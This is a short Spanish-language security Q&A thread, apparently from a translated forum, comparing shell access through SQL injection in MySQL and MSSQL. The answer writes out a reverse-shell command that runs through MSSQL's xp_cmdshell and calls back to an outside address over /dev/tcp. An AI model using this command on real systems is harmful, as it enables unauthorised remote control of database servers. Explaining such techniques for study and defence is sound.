inyección de MySQL vs MSSQL para cargar shell [cerrado]

Navega tus respuestas
-1

¿Cuál es la diferencia entre cargar una shell a través de sqli en mysql vs mssql?

    
pregunta thefirethefox 24.12.2014 - 21:28
fuente

1 respuesta

2

MSSQL tiene un comando incorporado llamado xp_cmdshell que ejecuta los comandos del sistema para ti (¿qué tan útil, eh?). Entonces, así es como se obtiene un shell en un sistema Linux que ejecuta MSSQL:

  

EXEC xp_cmdshell ‘bash -i > & /dev/tcp/10.0.0.1/8080 0 > & 1 ’

Con MySQL, tienes que ser realmente inteligente en cuanto a las cosas y usar OUTFILE, un procedimiento almacenado o algo similar.

    
respondido por el Ohnana 24.12.2014 - 23:09
fuente

Lea otras preguntas en las etiquetas

Emulando al cliente enviando un volcado hexadecimal cifrado al servidor de dB y obteniendo respuesta de nuevo [cerrado] Implementación de HSTS [cerrado]